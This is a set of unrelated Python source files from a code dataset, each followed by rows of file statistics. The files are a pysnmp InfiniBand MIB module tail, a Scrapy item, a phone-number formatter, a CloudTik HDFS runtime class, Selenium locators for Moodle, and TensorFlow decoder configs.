ibSmaSMGroup = ibSmaSMGroup.setStatus('current')
ibSmaVendDiagGroup = ObjectGroup((1, 3, 6, 1, 3, 117, 3, 3, 2, 13)).setObjects(("IB-SMA-MIB", "ibSmaPortGenericDiagCode"), ("IB-SMA-MIB", "ibSmaPortVendorDiagCode"), ("IB-SMA-MIB", "ibSmaPortVendorDiagIndexFwd"), ("IB-SMA-MIB", "ibSmaPortVendorDiagData"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ibSmaVendDiagGroup = ibSmaVendDiagGroup.setStatus('current')
ibSmaLedGroup = ObjectGroup((1, 3, 6, 1, 3, 117, 3, 3, 2, 14)).setObjects(("IB-SMA-MIB", "ibSmaLedState"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ibSmaLedGroup = ibSmaLedGroup.setStatus('current')
ibSmaNotificationsGroup = NotificationGroup((1, 3, 6, 1, 3, 117, 3, 3, 2, 15)).setObjects(("IB-SMA-MIB", "ibSmaPortLinkStateChange"), ("IB-SMA-MIB", "ibSmaLinkIntegrityThresReached"), ("IB-SMA-MIB", "ibSmaExcessBuffOverrunThres"), ("IB-SMA-MIB", "ibSmaFlowCntrlUpdateTimerExpire"), ("IB-SMA-MIB", "ibSmaCapabilityMaskModified"), ("IB-SMA-MIB", "ibSmaSysImageGuidModified"), ("IB-SMA-MIB", "ibSmaBadManagementKey"), ("IB-SMA-MIB", "ibSmaBadPartitionKey"), ("IB-SMA-MIB", "ibSmaBadQueueKey"), ("IB-SMA-MIB", "ibSmaBadPKeyAtSwitchPort"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ibSmaNotificationsGroup = ibSmaNotificationsGroup.setStatus('current')
mibBuilder.exportSymbols("IB-SMA-MIB", ibSmaNodeBaseVersion=ibSmaNodeBaseVersion, ibSmaRandomForwardingTable=ibSmaRandomForwardingTable, ibSmaNotificationPrefix=ibSmaNotificationPrefix, ibSmaNodeRevision=ibSmaNodeRevision, ibSmaSmInfoEntry=ibSmaSmInfoEntry, ibSmaVendDiagInfoEntry=ibSmaVendDiagInfoEntry, ibSmaMgmtPortGroup=ibSmaMgmtPortGroup, ibSmaNodeType=ibSmaNodeType, ibSmaNodeGid1=ibSmaNodeGid1, ibSmaPKeyIBAPortIndex=ibSmaPKeyIBAPortIndex, ibSmaMIB=ibSmaMIB, ibSmaBadManagementKey=ibSmaBadManagementKey, ibSmaFullSwitchCompliance=ibSmaFullSwitchCompliance, ibSmaPKeyIndex=ibSmaPKeyIndex, ibSmaPortInitTypeContent=ibSmaPortInitTypeContent, ibSmaLinDestDLIDIndex=ibSmaLinDestDLIDIndex, ibSmaPortIndex=ibSmaPortIndex, ibSmaPKeyTable=ibSmaPKeyTable, ibSmaVendDiagInfoTable=ibSmaVendDiagInfoTable, ibSmaHiPriVirtLane=ibSmaHiPriVirtLane, ibSmaVLArbitGroup=ibSmaVLArbitGroup, ibSmaNodeNumPorts=ibSmaNodeNumPorts, ibSmaPortInitPreserveContReply=ibSmaPortInitPreserveContReply, ibSmaSubMgrInfo=ibSmaSubMgrInfo, ibSmaLFTInfo=ibSmaLFTInfo, ibSmaSwPartitionEnforceNum=ibSmaSwPartitionEnforceNum, ibSmaRandomForwardingPortIndex=ibSmaRandomForwardingPortIndex, ibSmaSMInfo=ibSmaSMInfo, ibSmaPortOperationalVls=ibSmaPortOperationalVls, ibSmaPortInitNoLoadReply=ibSmaPortInitNoLoadReply, ibSmaBadQueueKey=ibSmaBadQueueKey, ibSmaRFTInfo=ibSmaRFTInfo, ibSmaPortNumGuid=ibSmaPortNumGuid, ibSmaHiPriVlArbEntry=ibSmaHiPriVlArbEntry, ibSmaPortMKeyProtectBits=ibSmaPortMKeyProtectBits, ibSmaLowPriWeight=ibSmaLowPriWeight, ibSmaServiceLevelIndex=ibSmaServiceLevelIndex, ibSmaPortGenericDiagCode=ibSmaPortGenericDiagCode, ibSmaGroups=ibSmaGroups, ibSmaNodeAttributeId=ibSmaNodeAttributeId, ibSmaNodeQueuePair2=ibSmaNodeQueuePair2, ibSmaPortLinkSpeedActive=ibSmaPortLinkSpeedActive, ibSmaVendDiagGroup=ibSmaVendDiagGroup, ibSmaSwLinearFdbTop=ibSmaSwLinearFdbTop, ibSmaPortMasterSmSl=ibSmaPortMasterSmSl, ibSmaLinForwEgressPort=ibSmaLinForwEgressPort, ibSmaPortLinkDownDefaultState=ibSmaPortLinkDownDefaultState, ibSmaLedIndex=ibSmaLedIndex, ibSmaSwitchGroup=ibSmaSwitchGroup, ibSmaPortPhysState=ibSmaPortPhysState, ibSmaPortLinkState=ibSmaPortLinkState, ibSmaSwFilterRawPktInputCap=ibSmaSwFilterRawPktInputCap, ibSmaPortVlArbHighCapacity=ibSmaPortVlArbHighCapacity, ibSmaGuidIndex=ibSmaGuidIndex, ibSmaPortVlStallCount=ibSmaPortVlStallCount, ibSmaPortMKeyViolations=ibSmaPortMKeyViolations, ibSmaPortInfoEntry=ibSmaPortInfoEntry, ibSmaVendDiagInfo=ibSmaVendDiagInfo, ibSmaLedState=ibSmaLedState, ibSmaNodeDataValid=ibSmaNodeDataValid, ibSmaRandomIsValid=ibSmaRandomIsValid, ibSmaNodeLid=ibSmaNodeLid, ibSmaGuidGroup=ibSmaGuidGroup, ibSmaPortMtuCapacity=ibSmaPortMtuCapacity, ibSmaSysImageGuidModified=ibSmaSysImageGuidModified, ibSmaIBAOutPortIndex=ibSmaIBAOutPortIndex, ibSmaLowPriIBAPortIndex=ibSmaLowPriIBAPortIndex, ibSmaPortInitTypePresence=ibSmaPortInitTypePresence, ibSmaNodePartitionTableNum=ibSmaNodePartitionTableNum, ibSmaCompliances=ibSmaCompliances, ibSmaPortIsLedInfoSupported=ibSmaPortIsLedInfoSupported, ibSmaPortIsReinitSupported=ibSmaPortIsReinitSupported, ibSmaGuidInfoEntry=ibSmaGuidInfoEntry, PYSNMP_MODULE_ID=ibSmaMIB, ibSmaNodeKey=ibSmaNodeKey, ibSmaPortIsSysImgGuidSupported=ibSmaPortIsSysImgGuidSupported, ibSmaPortResponseTimeValue=ibSmaPortResponseTimeValue, ibSmaHiPriWeight=ibSmaHiPriWeight, ibSmaNodePortGuid=ibSmaNodePortGuid, ibSmaFullRouterCACompliance=ibSmaFullRouterCACompliance, ibSmaNodeGuid=ibSmaNodeGuid, ibSmaPortQKeyViolations=ibSmaPortQKeyViolations, ibSmaHiPriIBAPortIndex=ibSmaHiPriIBAPortIndex, ibSmaLowPriVlArbEntry=ibSmaLowPriVlArbEntry, ibSmaNotificationsGroup=ibSmaNotificationsGroup, ibSmaSmInfoTable=ibSmaSmInfoTable, ibSmaSwLifeTimeValue=ibSmaSwLifeTimeValue, ibSmaMulForwMask=ibSmaMulForwMask, ibSmaPKeyBase=ibSmaPKeyBase, ibSmaPortLocalPhysErrorThreshold=ibSmaPortLocalPhysErrorThreshold, ibSmaPortNeighborMtu=ibSmaPortNeighborMtu, ibSmaRandomForwardingEntry=ibSmaRandomForwardingEntry, ibSmaNodeInfo=ibSmaNodeInfo, ibSmaPortInitTypeResuscitate=ibSmaPortInitTypeResuscitate, ibSmaRandomForwEgressPort=ibSmaRandomForwEgressPort, ibSmaPortIsSlMappingSupported=ibSmaPortIsSlMappingSupported, ibSmaMulForEntry=ibSmaMulForEntry, ibSmaSlToVlMapGroup=ibSmaSlToVlMapGroup, ibSmaSwDefMcastPriPort=ibSmaSwDefMcastPriPort, ibSmaPortMasterSmLid=ibSmaPortMasterSmLid, ibSmaHiPriVlArbTable=ibSmaHiPriVlArbTable, ibSmaSwInboundEnforceCap=ibSmaSwInboundEnforceCap, ibSmaPortVlHighPriorityLimit=ibSmaPortVlHighPriorityLimit, ibSmaPortIsSubnetManager=ibSmaPortIsSubnetManager, ibSmaPortIsDrNoticeSupported=ibSmaPortIsDrNoticeSupported, ibSmaPortFilterRawPktInbound=ibSmaPortFilterRawPktInbound, ibSmaPortMKeyLeasePeriod=ibSmaPortMKeyLeasePeriod, ibSmaSystemImageGuid=ibSmaSystemImageGuid, ibSmaPortGidPrefix=ibSmaPortGidPrefix, ibSmaPortLid=ibSmaPortLid, ibSmaPortLidMaskCount=ibSmaPortLidMaskCount, ibSmaSmSmKey=ibSmaSmSmKey, ibSmaSMGroup=ibSmaSMGroup, ibSmaPortMKey=ibSmaPortMKey, ibSmaLedInfoTable=ibSmaLedInfoTable, ibSmaPortVendorDiagCode=ibSmaPortVendorDiagCode, ibSmaIBAInPortIndex=ibSmaIBAInPortIndex, ibSmaVendDiagPortIndex=ibSmaVendDiagPortIndex, ibSmaPortVendorDiagData=ibSmaPortVendorDiagData, ibSmaSwDefaultPort=ibSmaSwDefaultPort, ibSmaFlowCntrlUpdateTimerExpire=ibSmaFlowCntrlUpdateTimerExpire, ibSmaPortLinkSpeedEnabled=ibSmaPortLinkSpeedEnabled, ibSmaNodeVendorId=ibSmaNodeVendorId, ibSmaSwPortStateChange=ibSmaSwPortStateChange, ibSmaLowPriVlArbTable=ibSmaLowPriVlArbTable, ibSmaPortIsSmDisabled=ibSmaPortIsSmDisabled, ibSmaPortIsBootMgmtSupported=ibSmaPortIsBootMgmtSupported, ibSmaPKeyMembership=ibSmaPKeyMembership, ibSmaRandomDestLID=ibSmaRandomDestLID, ibSmaSmSmpCount=ibSmaSmSmpCount, ibSmaPortVendorDiagIndexFwd=ibSmaPortVendorDiagIndexFwd, ibSmaLinForEntry=ibSmaLinForEntry, ibSmaSwFilterRawPktOutputCap=ibSmaSwFilterRawPktOutputCap, ibSmaSmInfoPortIndex=ibSmaSmInfoPortIndex, ibSmaPortIsPKeyExtPortTrapSup=ibSmaPortIsPKeyExtPortTrapSup, ibSmaLFTGroup=ibSmaLFTGroup, ibSmaPortFilterRawPktOutbound=ibSmaPortFilterRawPktOutbound, ibSmaPortIsVendorClassSupported=ibSmaPortIsVendorClassSupported, ibSmaPortIsDevManageSupported=ibSmaPortIsDevManageSupported, ibSmaPortLinkWidthEnabled=ibSmaPortLinkWidthEnabled, ibSmaPortLinkWidthSupported=ibSmaPortLinkWidthSupported, ibSmaLinkIntegrityThresReached=ibSmaLinkIntegrityThresReached, ibSmaNodeClassVersion=ibSmaNodeClassVersion, ibSmaDataPortInfo=ibSmaDataPortInfo, ibSmaNodeLocalPortNumOrZero=ibSmaNodeLocalPortNumOrZero, ibSmaPortInitTypeLoad=ibSmaPortInitTypeLoad, ibSmaPKeyInfo=ibSmaPKeyInfo, ibSmaGuidVal=ibSmaGuidVal, ibSmaLinForTable=ibSmaLinForTable, ibSmaMgmtPortInfo=ibSmaMgmtPortInfo, ibSmaSwMulticastFdbTableNum=ibSmaSwMulticastFdbTableNum, ibSmaNodeDeviceId=ibSmaNodeDeviceId, ibSmaMFTGroup=ibSmaMFTGroup, ibSmaSwEnhancedPort0=ibSmaSwEnhancedPort0, ibSmaHiPriNIndex=ibSmaHiPriNIndex, ibSmaSwLidsPerPort=ibSmaSwLidsPerPort, ibSmaLedGroup=ibSmaLedGroup, ibSmaNodeGroup=ibSmaNodeGroup, ibSmaPortSubnetTimeout=ibSmaPortSubnetTimeout, ibSmaSL2VLMapEntry=ibSmaSL2VLMapEntry, ibSmaSlToVlMapInfo=ibSmaSlToVlMapInfo, ibSmaPortInitPreservePresReply=ibSmaPortInitPreservePresReply, ibSmaBasicNodeCompliance=ibSmaBasicNodeCompliance, ibSmaMulDestDLIDIndex=ibSmaMulDestDLIDIndex, ibSmaMFTInfo=ibSmaMFTInfo, ibSmaBadPartitionKey=ibSmaBadPartitionKey, ibSmaCapabilityMaskModified=ibSmaCapabilityMaskModified, ibSmaNodeString=ibSmaNodeString, ibSmaSmGuid=ibSmaSmGuid, ibSmaPortLinkStateChange=ibSmaPortLinkStateChange, ibSmaLowPriNIndex=ibSmaLowPriNIndex, ibSmaPortPKeyViolations=ibSmaPortPKeyViolations, ibSmaSmPriority=ibSmaSmPriority, ibSmaVirtualLane=ibSmaVirtualLane, ibSmaConformance=ibSmaConformance, ibSmaNodeGid2=ibSmaNodeGid2, ibSmaLedInfoEntry=ibSmaLedInfoEntry, ibSmaPortIsSnmpTunnelSupported=ibSmaPortIsSnmpTunnelSupported, ibSmaGuidInfo=ibSmaGuidInfo, ibSmaPKeyEntry=ibSmaPKeyEntry, ibSmaSwRandomFdbTableNum=ibSmaSwRandomFdbTableNum, ibSmaLowPriVirtLane=ibSmaLowPriVirtLane, ibSmaPortHeadOfQueueLife=ibSmaPortHeadOfQueueLife, ibSmaPortLinkWidthActive=ibSmaPortLinkWidthActive, ibSmaRFTGroup=ibSmaRFTGroup, ibSmaSwitchInfo=ibSmaSwitchInfo, ibSmaNodeAttributeModifier=ibSmaNodeAttributeModifier, ibSmaSL2VLMapTable=ibSmaSL2VLMapTable, ibSmaPortLinkSpeedSupported=ibSmaPortLinkSpeedSupported, ibSmaObjects=ibSmaObjects, ibSmaDataPortGroup=ibSmaDataPortGroup, ibSmaPortIsCommManageSupported=ibSmaPortIsCommManageSupported, ibSmaVLArbitInfo=ibSmaVLArbitInfo, ibSmaNodeLid2=ibSmaNodeLid2, ibSmaPortIsPKeyNvram=ibSmaPortIsPKeyNvram, ibSmaPortOverrunErrorThreshold=ibSmaPortOverrunErrorThreshold, ibSmaBadPKeyAtSwitchPort=ibSmaBadPKeyAtSwitchPort, ibSmaNotifications=ibSmaNotifications, ibSmaPortIsCapMaskNoticSupported=ibSmaPortIsCapMaskNoticSupported, ibSmaSwDefMcastNotPriPort=ibSmaSwDefMcastNotPriPort, ibSmaGuidInfoTable=ibSmaGuidInfoTable, ibSmaSwOutboundEnforceCap=ibSmaSwOutboundEnforceCap, ibSmaNodeQueuePair1=ibSmaNodeQueuePair1, ibSmaSwLinearFdbTableNum=ibSmaSwLinearFdbTableNum, ibSmaPortPartEnforceOutbound=ibSmaPortPartEnforceOutbound, ibSmaPortIsMKeyNvram=ibSmaPortIsMKeyNvram, ibSmaPortIsNoticeSupported=ibSmaPortIsNoticeSupported, ibSmaMulForTable=ibSmaMulForTable, ibSmaGuidPortIndex=ibSmaGuidPortIndex, ibSmaNodeServiceLevel=ibSmaNodeServiceLevel, ibSmaPortVlArbLowCapacity=ibSmaPortVlArbLowCapacity, ibSmaPortInfoTable=ibSmaPortInfoTable, ibSmaPKeyGroup=ibSmaPKeyGroup, ibSmaPortIsAutoMigrateSupported=ibSmaPortIsAutoMigrateSupported, ibSmaRandomLMC=ibSmaRandomLMC, ibSmaNodePortNum=ibSmaNodePortNum, ibSmaNodeSwitchLid=ibSmaNodeSwitchLid, ibSmaExcessBuffOverrunThres=ibSmaExcessBuffOverrunThres, ibSmaNodeCapMask=ibSmaNodeCapMask, ibSmaLedInfo=ibSmaLedInfo, ibSmaPortVirtLaneSupport=ibSmaPortVirtLaneSupport, ibSmaPortPartEnforceInbound=ibSmaPortPartEnforceInbound, ibSmaSmState=ibSmaSmState, ibSmaNodeMethod=ibSmaNodeMethod, ibSmaPortIsTrapSupported=ibSmaPortIsTrapSupported)
| 139.588865 | 9,787 | 0.760953 | 6,990 | 65,188 | 7.09628 | 0.065379 | 0.018749 | 0.037417 | 0.018063 | 0.424692 | 0.400379 | 0.359817 | 0.314477 | 0.299458 | 0.279398 | 0 | 0.064968 | 0.076302 | 65,188 | 466 | 9,788 | 139.888412 | 0.75881 | 0.004817 | 0 | 0.039474 | 0 | 0 | 0.169444 | 0.038557 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.017544 | 0 | 0.017544 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
92ff939e3b1d1eee8ccfc1455baf536ac0d29520 | 1,135 | py | Python | scripts/drugRegSpider/items.py | aa989190f363e46d/rcethRegsSpiders | 2ec7cae3ef200a28b7d8418d9c841fe0b8d8abe3 | [
"MIT"
] | null | null | null | scripts/drugRegSpider/items.py | aa989190f363e46d/rcethRegsSpiders | 2ec7cae3ef200a28b7d8418d9c841fe0b8d8abe3 | [
"MIT"
] | null | null | null | scripts/drugRegSpider/items.py | aa989190f363e46d/rcethRegsSpiders | 2ec7cae3ef200a28b7d8418d9c841fe0b8d8abe3 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Define here the models for your scraped items
#
# See documentation in:
# http://doc.scrapy.org/en/latest/topics/items.html
import scrapy
class DrugregspiderItem(scrapy.Item):
# define the fields for your item here like:
# name = scrapy.Field()
#Торговое наименование
name = scrapy.Field()
#Международное наименование
mnn = scrapy.Field()
#Формы выпуска
lForm = scrapy.Field()
#Производитель
manufacturer = scrapy.Field()
#Заявитель
invoker = scrapy.Field()
#Номер удостоверения
certNum = scrapy.Field()
#Дата регистрации
regDtBegin = scrapy.Field()
#Срок действия
regDtExpire = scrapy.Field()
#Оригинальное
originality = scrapy.Field()
# Руководства
manuals = scrapy.Field()
# Files pipeline
# http://doc.scrapy.org/en/latest/topics/media-pipeline.html#using-the-files-pipeline
file_urls = scrapy.Field()
files = scrapy.Field()
| 29.102564 | 89 | 0.571806 | 109 | 1,135 | 5.944954 | 0.550459 | 0.220679 | 0.040123 | 0.049383 | 0.092593 | 0.092593 | 0.092593 | 0 | 0 | 0 | 0 | 0.001318 | 0.331278 | 1,135 | 38 | 90 | 29.868421 | 0.852437 | 0.420264 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.071429 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
130501d94529b390bf45ee54ecec85c043c6f85c | 189 | py | Python | Codewars/Phone_number.py | Gbrvi/Python | 02f0125c990f06ccb5cd705b4bf6ec5ecb6d1eab | [
"MIT"
] | null | null | null | Codewars/Phone_number.py | Gbrvi/Python | 02f0125c990f06ccb5cd705b4bf6ec5ecb6d1eab | [
"MIT"
] | null | null | null | Codewars/Phone_number.py | Gbrvi/Python | 02f0125c990f06ccb5cd705b4bf6ec5ecb6d1eab | [
"MIT"
] | null | null | null | def phone_number(num):
string = [(str(x)) for x in num]
string = ''.join(string)
return f'({string[:3]}) {string[3:6]}-{string[6:]}'
print(phone_number([1,2,3,4,5,6,7,8,9,0]))
| 27 | 55 | 0.57672 | 36 | 189 | 2.972222 | 0.638889 | 0.205607 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.0875 | 0.153439 | 189 | 6 | 56 | 31.5 | 0.58125 | 0 | 0 | 0 | 0 | 0 | 0.216931 | 0.137566 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0 | 0 | 0.4 | 0.2 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
1305d3f8a807f4b6a12d0b0e502ee66cf1c8d19e | 3,521 | py | Python | python/cloudtik/runtime/hdfs/runtime.py | jerrychenhf/cloudtik | 5ceab948c5c8b2e00f644d2fb801311572aaf381 | [
"Apache-2.0"
] | null | null | null | python/cloudtik/runtime/hdfs/runtime.py | jerrychenhf/cloudtik | 5ceab948c5c8b2e00f644d2fb801311572aaf381 | [
"Apache-2.0"
] | null | null | null | python/cloudtik/runtime/hdfs/runtime.py | jerrychenhf/cloudtik | 5ceab948c5c8b2e00f644d2fb801311572aaf381 | [
"Apache-2.0"
] | null | null | null | import logging
from typing import Any, Dict
from cloudtik.core.node_provider import NodeProvider
from cloudtik.core.runtime import Runtime
from cloudtik.runtime.hdfs.utils import _config_runtime_resources, _with_runtime_environment_variables, \
_is_runtime_scripts, _get_runnable_command, _get_runtime_processes, _validate_config, \
_verify_config, _get_runtime_logs, _get_runtime_commands, \
_get_defaults_config, _get_useful_urls, publish_service_uri
logger = logging.getLogger(__name__)
class HDFSRuntime(Runtime):
"""Implementation for HDFS Runtime"""
def __init__(self, runtime_config: Dict[str, Any]) -> None:
Runtime.__init__(self, runtime_config)
def prepare_config(self, cluster_config: Dict[str, Any]) -> Dict[str, Any]:
"""Prepare runtime specific configurations"""
return _config_runtime_resources(cluster_config)
def validate_config(self, cluster_config: Dict[str, Any], provider: NodeProvider):
"""Validate cluster configuration from runtime perspective."""
_validate_config(cluster_config, provider)
def verify_config(self, cluster_config: Dict[str, Any], provider: NodeProvider):
"""Verify cluster configuration at the last stage of bootstrap.
The verification may mean a slow process to check with a server"""
_verify_config(cluster_config, provider)
def with_environment_variables(
self, config: Dict[str, Any], provider: NodeProvider,
node_id: str) -> Dict[str, Any]:
"""Export necessary runtime environment variables for running node commands.
For example: {"ENV_NAME": value}
"""
return _with_runtime_environment_variables(
self.runtime_config, config=config, provider=provider, node_id=node_id)
def cluster_booting_completed(
self, cluster_config: Dict[str, Any], head_node_id: str) -> None:
publish_service_uri(cluster_config, head_node_id)
def get_runnable_command(self, target: str):
"""Return the runnable command for the target script.
For example: ["bash", target]
"""
if not _is_runtime_scripts(target):
return None
return _get_runnable_command(target)
def get_runtime_commands(self, cluster_config: Dict[str, Any]) -> Dict[str, Any]:
"""Returns a copy of runtime commands to run at different stages"""
return _get_runtime_commands(self.runtime_config, cluster_config)
def get_defaults_config(self, cluster_config: Dict[str, Any]) -> Dict[str, Any]:
"""Returns a copy of runtime config"""
return _get_defaults_config(self.runtime_config, cluster_config)
def get_useful_urls(self, cluster_head_ip: str):
return _get_useful_urls(cluster_head_ip)
@staticmethod
def get_logs() -> Dict[str, str]:
"""Return a dictionary of name to log paths.
For example {"server-a": "/tmp/server-a/logs"}
"""
return _get_runtime_logs()
@staticmethod
def get_processes():
"""Return a list of processes for this runtime.
Format:
#1 Keyword to filter,
#2 filter by command (True)/filter by args (False)
#3 The third element is the process name.
#4 The forth element, if node, the process should on all nodes, if head, the process should on head node.
For example
["cloudtik_cluster_controller.py", False, "ClusterController", "head"],
"""
return _get_runtime_processes()
| 41.423529 | 113 | 0.697813 | 440 | 3,521 | 5.290909 | 0.268182 | 0.039089 | 0.051546 | 0.054983 | 0.200172 | 0.174399 | 0.147337 | 0.116409 | 0.116409 | 0.070876 | 0 | 0.001444 | 0.213292 | 3,521 | 84 | 114 | 41.916667 | 0.838989 | 0.279182 | 0 | 0.047619 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.285714 | false | 0 | 0.119048 | 0.02381 | 0.642857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
1318b8641881f35a74ed810ae1bb87e682e783be | 2,381 | py | Python | locators/create_course_page_locators.py | KKashpovski/test_moodle_project | 8cd0a53fffe797c47d3b14cc3300c610467432e3 | [
"Apache-2.0"
] | null | null | null | locators/create_course_page_locators.py | KKashpovski/test_moodle_project | 8cd0a53fffe797c47d3b14cc3300c610467432e3 | [
"Apache-2.0"
] | null | null | null | locators/create_course_page_locators.py | KKashpovski/test_moodle_project | 8cd0a53fffe797c47d3b14cc3300c610467432e3 | [
"Apache-2.0"
] | null | null | null | """Локаторы страницы создания курса."""
from selenium.webdriver.common.by import By
class CreateCourseGeneralLocators:
FULL_NAME_COURSE = (By.CSS_SELECTOR, "input#id_fullname")
NAME_COURSE = (By.CSS_SELECTOR, "input#id_shortname")
COURSE_VISIBILITY = (By.CSS_SELECTOR, "select#id_visible")
BEGIN_DAY_COURSE = (By.CSS_SELECTOR, "select#id_startdate_day")
BEGIN_MONTH_COURSE = (By.CSS_SELECTOR, "select#id_startdate_month")
BEGIN_YEAR_COURSE = (By.CSS_SELECTOR, "select#id_startdate_year")
END_DAY_COURSE = (By.CSS_SELECTOR, "select#id_enddate_day")
END_MONTH_COURSE = (By.CSS_SELECTOR, "select#id_enddate_month")
END_YEAR_COURSE = (By.CSS_SELECTOR, "select#id_enddate_year")
ID_COURSE = (By.CSS_SELECTOR, "input#id_idnumber")
SAVE_BUTTON = (By.CSS_SELECTOR, "input#id_saveanddisplay")
NAVBAR_ITEMS = (By.CLASS_NAME, "breadcrumb-item")
COURSE_CREATE_HEADER = (By.TAG_NAME, "h1")
class CreateCourseDescriptionLocators:
DESCRIPTION_FIELD = (By.CSS_SELECTOR, ".editor_atto_content [dir]")
class CreateCourseImagesLocators:
OPEN_IMAGE_MENU_BUTTON = (
By.CSS_SELECTOR,
"a[role='button'] > .fa.fa-file-o.fa-fw.icon",
)
DOWNLOAD_FILES_BY_URL = (
By.CSS_SELECTOR,
"div:nth-of-type(5) > .nav-link > .fp-repo-name",
)
FIELD_FOR_INPUT_URL = (By.CSS_SELECTOR, "input#fileurl")
DOWNLOAD_BUTTON = (By.CSS_SELECTOR, ".btn.btn-primary.fp-login-submit")
IMAGE_BUTTON = (By.CSS_SELECTOR, ".fp-reficons2")
SELECT_IMAGE_BUTTON = (By.CSS_SELECTOR, ".fp-select-confirm.btn")
GO_TO_ALL_COURSES = (By.CSS_SELECTOR, "ol > li:nth-of-type(2) > a")
COURSE_INFO_ICON = (
By.CSS_SELECTOR,
".collapsed.coursebox.first.odd a[title='Описание'] > i[title='Описание']",
)
COURSE_INFO = (By.CSS_SELECTOR, ".coursebox.first.loaded.odd")
COURSE_IMAGE = (By.CSS_SELECTOR, ".courseimage>img")
class CreateCourseGroupsLocators:
GROUPS_DESCRIPTION = (By.CSS_SELECTOR, "#id_groups .ftoggler [role]")
GROUP_MODE = (By.NAME, "groupmode")
FORCED_GROUP_MODE = (By.XPATH, "/html//select[@id='id_groupmodeforce']")
class CreateCourseTagsLocators:
TAGS_DESCRIPTION = (By.CSS_SELECTOR, "fieldset#id_tagshdr a[role='button']")
TAGS_FOR_COURSE = (
By.XPATH,
"/html//div[@id='fitem_id_tags']/div[2]//input[@role='combobox']",
)
| 39.032787 | 83 | 0.701806 | 313 | 2,381 | 5.022364 | 0.367412 | 0.076336 | 0.198473 | 0.108779 | 0.262723 | 0.236641 | 0.187023 | 0 | 0 | 0 | 0 | 0.002484 | 0.154557 | 2,381 | 60 | 84 | 39.683333 | 0.77844 | 0.01386 | 0 | 0.06383 | 0 | 0.06383 | 0.323228 | 0.169513 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.021277 | 0 | 0.744681 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
131be37785f21f1326a7f4f9c8ee2c6bb85f18c1 | 1,935 | py | Python | official/vision/beta/configs/decoders.py | KiryanovKD/models | e17080247e3c9b3301680f61b8f4815c22509e7e | [
"Apache-2.0"
] | 4 | 2019-11-02T14:47:46.000Z | 2022-01-14T10:43:02.000Z | official/vision/beta/configs/decoders.py | KiryanovKD/models | e17080247e3c9b3301680f61b8f4815c22509e7e | [
"Apache-2.0"
] | 6 | 2021-10-05T18:53:55.000Z | 2022-03-29T21:37:00.000Z | official/vision/beta/configs/decoders.py | KiryanovKD/models | e17080247e3c9b3301680f61b8f4815c22509e7e | [
"Apache-2.0"
] | 2 | 2021-11-30T21:50:03.000Z | 2022-03-27T01:27:31.000Z | # Copyright 2021 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Decoders configurations."""
import dataclasses
from typing import List, Optional
# Import libraries
from official.modeling import hyperparams
@dataclasses.dataclass
class Identity(hyperparams.Config):
"""Identity config."""
pass
@dataclasses.dataclass
class FPN(hyperparams.Config):
"""FPN config."""
num_filters: int = 256
fusion_type: str = 'sum'
use_separable_conv: bool = False
@dataclasses.dataclass
class NASFPN(hyperparams.Config):
"""NASFPN config."""
num_filters: int = 256
num_repeats: int = 5
use_separable_conv: bool = False
@dataclasses.dataclass
class ASPP(hyperparams.Config):
"""ASPP config."""
level: int = 4
dilation_rates: List[int] = dataclasses.field(default_factory=list)
dropout_rate: float = 0.0
num_filters: int = 256
use_depthwise_convolution: bool = False
pool_kernel_size: Optional[List[int]] = None # Use global average pooling.
spp_layer_version: str = 'v1'
output_tensor: bool = False
@dataclasses.dataclass
class Decoder(hyperparams.OneOfConfig):
"""Configuration for decoders.
Attributes:
type: 'str', type of decoder be used, one of the fields below.
fpn: fpn config.
"""
type: Optional[str] = None
fpn: FPN = FPN()
nasfpn: NASFPN = NASFPN()
identity: Identity = Identity()
aspp: ASPP = ASPP()
